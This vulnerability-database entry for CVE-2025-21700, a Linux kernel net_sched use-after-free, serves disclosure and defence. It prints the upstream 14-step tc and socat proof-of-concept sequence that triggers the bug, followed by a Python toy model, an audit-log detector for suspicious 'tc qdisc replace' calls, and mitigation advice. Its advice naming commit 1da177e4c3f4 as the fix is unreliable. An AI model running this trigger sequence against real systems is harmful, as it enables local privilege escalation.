
CVE-2025-21700: Vulnerability in Linux (Linux)

Severity: High
Type: Vulnerability
Published: Thu Feb 13 2025 (02/13/2025, 11:30:19 UTC)
Source: CVE
Vendor/Project: Linux
Product: Linux

Description

In the Linux kernel, the following vulnerability has been resolved:

net: sched: Disallow replacing of child qdisc from one parent to another

Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script:

Step 1. Create root qdisc
    tc qdisc add dev lo root handle 1:0 drr

Step 2. A class for packet aggregation to demonstrate UAF
    tc class add dev lo classid 1:1 drr

Step 3. A class for nesting
    tc class add dev lo classid 1:2 drr

Step 4. A class to graft qdisc to
    tc class add dev lo classid 1:3 drr

Step 5.
    tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

Step 6.
    tc qdisc add dev lo parent 1:2 handle 3:0 drr

Step 7.
    tc class add dev lo classid 3:1 drr

Step 8.
    tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

Step 9. Display the class/qdisc layout
    tc class ls dev lo
    class drr 1:1 root leaf 2: quantum 64Kb
    class drr 1:2 root leaf 3: quantum 64Kb
    class drr 3:1 root leaf 4: quantum 64Kb

    tc qdisc ls
    qdisc drr 1: dev lo root refcnt 2
    qdisc plug 2: dev lo parent 1:1
    qdisc pfifo 4: dev lo parent 3:1 limit 1000p
    qdisc drr 3: dev lo parent 1:2

Step 10. Trigger the bug <=== prevented by this patch
    tc qdisc replace dev lo parent 1:3 handle 4:0

Step 11. Redisplay again the qdiscs/classes
    tc class ls dev lo
    class drr 1:1 root leaf 2: quantum 64Kb
    class drr 1:2 root leaf 3: quantum 64Kb
    class drr 1:3 root leaf 4: quantum 64Kb
    class drr 3:1 root leaf 4: quantum 64Kb

    tc qdisc ls
    qdisc drr 1: dev lo root refcnt 2
    qdisc plug 2: dev lo parent 1:1
    qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
    qdisc drr 3: dev lo parent 1:2

Observe that
a) parent for 4:0 does not change despite the replace request. There can only be one parent.
b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12. Send one packet to plug
    echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

Step 13. Send one packet to the grafted fifo
    echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

Step 14. Let's trigger the UAF
    tc class delete dev lo classid 1:3
    tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node (3:1) and add to another node (1:3) as in step 10. While we could "fix" with a more complex approach there could be consequences to expectations, so the patch takes the preventive approach of "disallow such config".

Joint work with Lion Ackermann <nnamrec@gmail.com>

AI-Powered Analysis

AI analysis last updated: 07/03/2025, 05:41:41 UTC

Technical Analysis

CVE-2025-21700 is a high-severity use-after-free (UAF) vulnerability in the Linux kernel's network scheduler (net_sched) subsystem, specifically related to the handling of queuing disciplines (qdiscs) and classes. The vulnerability arises from improper handling of the 'replace' operation on child qdiscs, where the kernel incorrectly allows replacing a child qdisc from one parent class to another. This misuse leads to a state where multiple classes reference the same qdisc object, causing a use-after-free condition when one of the classes is deleted. The vulnerability was discovered and demonstrated by Lion Ackermann through a sequence of tc (traffic control) commands that create a root qdisc, add classes and nested qdiscs, and then attempt to replace a qdisc's parent improperly. The kernel's semantics expect 'replace' to operate only on the same node, but the exploit attempts to move a qdisc from one parent to another, which is disallowed by the patch. Exploiting this flaw can lead to privilege escalation, as the UAF can be abused to execute arbitrary code with elevated privileges. The vulnerability affects Linux kernel versions identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and was patched by disallowing such configurations rather than implementing a complex fix, to avoid breaking expected behavior. The CVSS v3.1 score is 7.8 (high), with attack vector local, low attack complexity, low privileges required, no user interaction, and impacts on confidentiality, integrity, and availability. No known exploits are reported in the wild yet.
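The invariant the patch protects is easiest to see in a small model. The following Python is an added example written for this page, not kernel code: it models only the pieces of the net_sched tree that the description and analysis above talk about (classes own at most one leaf qdisc, each qdisc records its single parent and a refcount, and "replace" grafts a qdisc under a class). The class and handle names follow the advisory's script, with handles written the way tc displays them ("4:" for "4:0"); the `enforce_same_parent` switch, the `QdiscTree` class and its method names are this example's own, and the pre-patch branch reproduces only what the advisory's step 11 output shows (the qdisc keeps its old parent, its displayed refcnt becomes 2, and two classes point at it), not the kernel's internal graft path.

```python
"""Toy model of the net_sched qdisc/class tree for CVE-2025-21700.

Added example, not kernel code.  Only what the advisory needs is modelled:
classes hold at most one leaf qdisc, every qdisc records its single parent
and a refcount, and 'replace' grafts a qdisc under a class.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Qdisc:
    handle: str   # e.g. "4:"
    kind: str     # e.g. "pfifo"
    parent: str   # "root" or the classid it hangs under, e.g. "3:1"
    refcnt: int = 1


class QdiscTree:
    def __init__(self, enforce_same_parent: bool) -> None:
        # True models the patched kernel, False the pre-patch behaviour.
        self.enforce_same_parent = enforce_same_parent
        self.qdiscs: dict[str, Qdisc] = {}
        self.leaf: dict[str, Optional[str]] = {}  # classid -> leaf qdisc handle

    def add_class(self, classid: str) -> None:
        self.leaf[classid] = None

    def add_qdisc(self, handle: str, kind: str, parent: str = "root") -> Qdisc:
        if handle in self.qdiscs:
            raise FileExistsError(f"qdisc {handle} already exists")
        if parent != "root" and parent not in self.leaf:
            raise KeyError(f"no such class {parent}")
        q = Qdisc(handle, kind, parent)
        self.qdiscs[handle] = q
        if parent != "root":
            self.leaf[parent] = handle
        return q

    def replace_qdisc(self, parent: str, handle: str, kind: str = "pfifo") -> str:
        """Model 'tc qdisc replace dev X parent <parent> handle <handle>'."""
        q = self.qdiscs.get(handle)
        if q is None:                      # nothing to replace: a plain add
            self.add_qdisc(handle, kind, parent)
            return "added"
        if q.parent == parent:             # del/add on the same node: no-op here
            return "unchanged"
        if self.enforce_same_parent:       # the patched behaviour: refuse the move
            raise PermissionError(
                f"refusing to move qdisc {handle} from {q.parent} to {parent}")
        # Pre-patch behaviour as the advisory's step 11 output shows it: the
        # qdisc is grafted under the new class while it stays the leaf of its
        # old parent, so two classes now point at one qdisc.
        self.leaf[parent] = handle
        q.refcnt += 1
        return "grafted"

    def classes_pointing_at(self, handle: str) -> list:
        return sorted(c for c, h in self.leaf.items() if h == handle)


def build_layout(enforce_same_parent: bool) -> QdiscTree:
    """Steps 1-8 of the advisory's script, as tree operations."""
    t = QdiscTree(enforce_same_parent)
    t.add_qdisc("1:", "drr")                 # step 1: root qdisc
    for c in ("1:1", "1:2", "1:3"):          # steps 2-4: classes under the root
        t.add_class(c)
    t.add_qdisc("2:", "plug", "1:1")         # step 5
    t.add_qdisc("3:", "drr", "1:2")          # step 6
    t.add_class("3:1")                       # step 7
    t.add_qdisc("4:", "pfifo", "3:1")        # step 8
    return t


def attempt_cross_parent_replace(t: QdiscTree) -> str:
    """Step 10: ask to put under 1:3 a qdisc that already lives under 3:1."""
    try:
        return t.replace_qdisc("1:3", "4:")
    except PermissionError:
        return "rejected"


if __name__ == "__main__":
    for patched in (False, True):
        t = build_layout(patched)
        outcome = attempt_cross_parent_replace(t)
        q = t.qdiscs["4:"]
        print("patched" if patched else "pre-patch", outcome,
              "| parent of 4: is", q.parent, "| refcnt", q.refcnt,
              "| classes pointing at it", t.classes_pointing_at("4:"))
```

Run stand-alone, the pre-patch tree ends up with qdisc 4: still parented at 3:1 but referenced from both 1:3 and 3:1, which is the state the advisory calls out before the class deletions; the patched tree refuses the request outright, which is the whole of the fix.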

Potential Impact

For European organizations, this vulnerability poses a significant risk, especially for those running Linux-based infrastructure, including servers, network appliances, and embedded devices. The ability to escalate privileges locally can allow attackers who have limited access (e.g., via compromised user accounts or containers) to gain root access, potentially leading to full system compromise. This can affect critical services, data confidentiality, and system availability. Organizations relying on Linux for network functions, cloud infrastructure, or edge computing are particularly vulnerable. The exploitation does not require user interaction but does require local access, which means insider threats or attackers who have gained initial footholds can leverage this flaw. The vulnerability could also be chained with other exploits to achieve remote code execution. Given the widespread use of Linux in Europe’s public and private sectors, including government, finance, telecommunications, and manufacturing, the impact could be broad and severe if unpatched.

Mitigation Recommendations

1. Immediate application of the official Linux kernel patch that disallows replacing child qdiscs from one parent to another is critical.
2. Update all affected Linux systems to the latest kernel versions containing the fix identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 or later.
3. Restrict local access to trusted users only, employing strict access controls and monitoring to detect suspicious use of tc commands or network scheduler manipulations.
4. Employ kernel hardening techniques such as SELinux or AppArmor to limit the impact of privilege escalation attempts.
5. Monitor system logs for unusual tc command usage or network scheduler configuration changes.
6. For containerized environments, ensure containers run with minimal privileges and consider using seccomp filters to restrict access to network configuration syscalls.
7. Conduct regular vulnerability scanning and penetration testing focused on local privilege escalation vectors.
8. Educate system administrators about this vulnerability and the importance of timely patching and access control.
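Recommendations 3 and 5 ask for monitoring of tc usage. One concrete way to do that on a host running auditd with an execve rule is to parse its EXECVE records and rank scheduler changes. The Python below is an added example written for this page, not tooling from the advisory or the kernel project: it decodes auditd's EXECVE argument encoding (quoted values, or hex for values auditd cannot quote), skips everything that is not a tc qdisc or class change, and raises a "qdisc replace" that names both a non-root parent and a handle to the highest tier, because that is the shape of the request in the advisory's step 10. The audit lines, timestamps and serials are constructed samples, and the tier names, the `scan` and `classify_tc` helpers and the keyword table are this example's own choices.

```python
"""Rank tc scheduler changes found in auditd EXECVE records.

Added example, not part of the advisory.  The audit records below are
constructed samples in auditd's EXECVE format, not from a real host.
"""
import os
import re
from typing import Optional

SAMPLE_AUDIT = """\
type=EXECVE msg=audit(1739446219.101:2001): argc=7 a0="tc" a1="qdisc" a2="add" a3="dev" a4="lo" a5="root" a6="drr"
type=EXECVE msg=audit(1739446219.102:2002): argc=5 a0="tc" a1="class" a2="ls" a3="dev" a4="lo"
type=SYSCALL msg=audit(1739446219.103:2003): arch=c000003e syscall=59 success=yes exit=0 comm="tc" exe="/usr/sbin/tc"
type=EXECVE msg=audit(1739446219.103:2003): argc=9 a0="tc" a1="qdisc" a2="replace" a3="dev" a4="lo" a5="parent" a6="1:3" a7="handle" a8="4:0"
type=EXECVE msg=audit(1739446219.104:2004): argc=3 a0="ls" a1="-l" a2="/tmp"
"""

# aN="quoted value"  or  aN=HEXBYTES (auditd hex-encodes values it cannot quote)
ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")

# tc keywords that take a value; "root" is a bare keyword meaning parent=root
TC_KEYED = {"dev", "parent", "handle", "classid", "limit", "quantum"}
TC_READ_ONLY = {"ls", "list", "show"}


def parse_execve(line: str) -> Optional[dict]:
    """Return {'ts', 'serial', 'argv'} for an EXECVE record, else None."""
    if not line.startswith("type=EXECVE"):
        return None
    m = EVENT_RE.search(line)
    args = {}
    for idx, whole, quoted, hexed in ARG_RE.findall(line):
        if whole.startswith('"'):
            args[int(idx)] = quoted
        else:
            args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace")
    argv = [args[i] for i in sorted(args)]
    return {"ts": m.group(1) if m else "?", "serial": m.group(2) if m else "?",
            "argv": argv}


def parse_tc_opts(tokens: list) -> dict:
    """Turn tc's 'key value' pairs into a dict; leftovers go under 'extra'."""
    opts: dict = {}
    it = iter(tokens)
    for tok in it:
        if tok in TC_KEYED:
            opts[tok] = next(it, "")
        elif tok == "root":
            opts["parent"] = "root"
        else:
            opts.setdefault("extra", []).append(tok)
    return opts


def classify_tc(argv: list) -> Optional[tuple]:
    """Return (tier, reason, opts) for a scheduler change, else None."""
    if len(argv) < 3 or os.path.basename(argv[0]) != "tc":
        return None
    obj, verb = argv[1], argv[2]
    if obj not in ("qdisc", "class") or verb in TC_READ_ONLY:
        return None
    opts = parse_tc_opts(argv[3:])
    if (obj == "qdisc" and verb == "replace"
            and opts.get("parent") not in (None, "root") and "handle" in opts):
        # The request shape from the advisory's step 10: triage which parent
        # the handle currently hangs under before deciding it is benign.
        return ("high", f"qdisc replace of handle {opts['handle']} "
                        f"under parent {opts['parent']}", opts)
    return ("info", f"tc {obj} {verb}", opts)


def scan(audit_text: str) -> list:
    """Walk an audit log excerpt and return one finding per tc change."""
    findings = []
    for line in audit_text.splitlines():
        rec = parse_execve(line)
        if rec is None:
            continue
        verdict = classify_tc(rec["argv"])
        if verdict is None:
            continue
        tier, reason, opts = verdict
        findings.append({**rec, "tier": tier, "reason": reason, "opts": opts})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_AUDIT):
        print(f"[{f['tier']:4}] audit serial {f['serial']}: {f['reason']}")
```

Feed it the output of `ausearch -m EXECVE` (or the raw audit.log) and the "high" findings are the ones worth correlating with the user and session fields of the matching SYSCALL record; the "info" findings give the baseline of normal scheduler changes on the host so that an unexpected actor stands out.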


Technical Details

Data Version: 5.1
Assigner Short Name: Linux
Date Reserved: 2024-12-29T08:45:45.748Z
CISA Enriched: true
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 682d9834c4522896dcbe985e

Added to database: 5/21/2025, 9:09:08 AM

Last enriched: 7/3/2025, 5:41:41 AM

Last updated: 7/25/2025, 12:17:20 PM

